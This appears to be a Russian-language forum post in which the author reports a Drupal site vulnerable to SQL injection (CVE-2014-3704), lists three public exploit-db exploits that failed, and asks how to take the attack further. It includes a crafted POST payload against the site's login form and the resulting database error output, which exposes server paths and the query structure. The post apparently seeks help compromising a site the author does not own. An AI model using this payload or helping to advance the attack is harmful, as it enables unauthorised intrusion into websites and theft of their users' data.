Есть сайт со sqli (старая версия drupal) CVE-2014-3704
Использовал следующие эксплоиты:
http://www.exploit-db.com/exploits/34993/
http://www.exploit-db.com/exploits/34992/
http://www.exploit-db.com/exploits/34984/
Но ни один не сработал, хотя и пишут, что новый пользователь был успешно создан.
Как раскрутить я не знаю.
Sqli при пост запросе:
http://www.site.com/?q=node&destination=node
name[0']=0;&name[0]=asd&pass=asd&test2=test&form_build_id=&form_id=us er_login_block&op=Log%2Bin
output:
Сообщение от
None
Warning: mb_strlen() expects parameter 1 to be string, array given in drupal_strlen() (Zeile 478 von /pages/bd/asd/home/htdocs/site/includes/unicode.inc).
Warning: addcslashes() expects parameter 1 to be string, array given in DatabaseConnection->escapeLike() (Zeile 981 von /pages/bd/asd/home/htdocs/site/includes/database/database.inc).
PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'asd' AND status = 1' at line 1: SELECT * FROM {users} WHERE name = :name_0', :name_0 AND status = 1; Array ( [:name_0'] => 0; [:name_0] => asd ) in user_login_authenticate_validate() (Zeile 2148 von /pages/bd/asd/home/htdocs/site/modules/user/user.module).